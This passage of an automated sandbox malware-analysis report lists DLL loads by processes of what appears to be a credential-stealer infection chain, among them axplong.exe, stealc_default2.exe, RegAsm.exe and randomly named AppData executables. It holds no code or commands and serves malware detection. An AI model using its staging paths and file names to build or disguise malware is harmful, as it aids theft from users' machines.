                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: esdsip.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: scrrun.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeSection loaded: msasn1.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: dwrite.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: msvcp140_clr0400.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: msasn1.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: msisip.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: wshext.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: appxsip.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: opcservices.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: esdsip.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: dpapi.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: gpapi.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: sxs.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: mpr.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: scrrun.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: linkinfo.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: secur32.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: wbemcomn.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: amsi.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: rstrtmgr.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: ncrypt.dll
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeSection loaded: ntasn1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: wininet.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: mstask.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: mpr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: dui70.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: duser.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: chartv.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: oleacc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: atlthunk.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: textinputframework.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: coreuicomponents.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: coremessaging.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: ntmarta.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: coremessaging.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: wtsapi32.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: winsta.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: textshaping.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: windows.fileexplorer.common.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: explorerframe.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: edputil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: appresolver.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: slc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: sppc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: wininet.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: wininet.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: winhttp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: edputil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: appresolver.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: slc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: sppc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: wininet.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: rstrtmgr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: ncrypt.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: ntasn1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: winhttp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: dpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: ntmarta.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: mozglue.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: wsock32.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: vcruntime140.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: msvcp140.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: vcruntime140.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000065001\stories.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1000065001\stories.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: mpr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: textinputframework.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: coreuicomponents.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: coremessaging.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: ntmarta.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: shfolder.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: rstrtmgr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: ncrypt.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: ntasn1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: msacm32.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: winmmbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: winmmbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: textshaping.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: riched20.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: usp10.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: msls31.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpSection loaded: explorerframe.dll
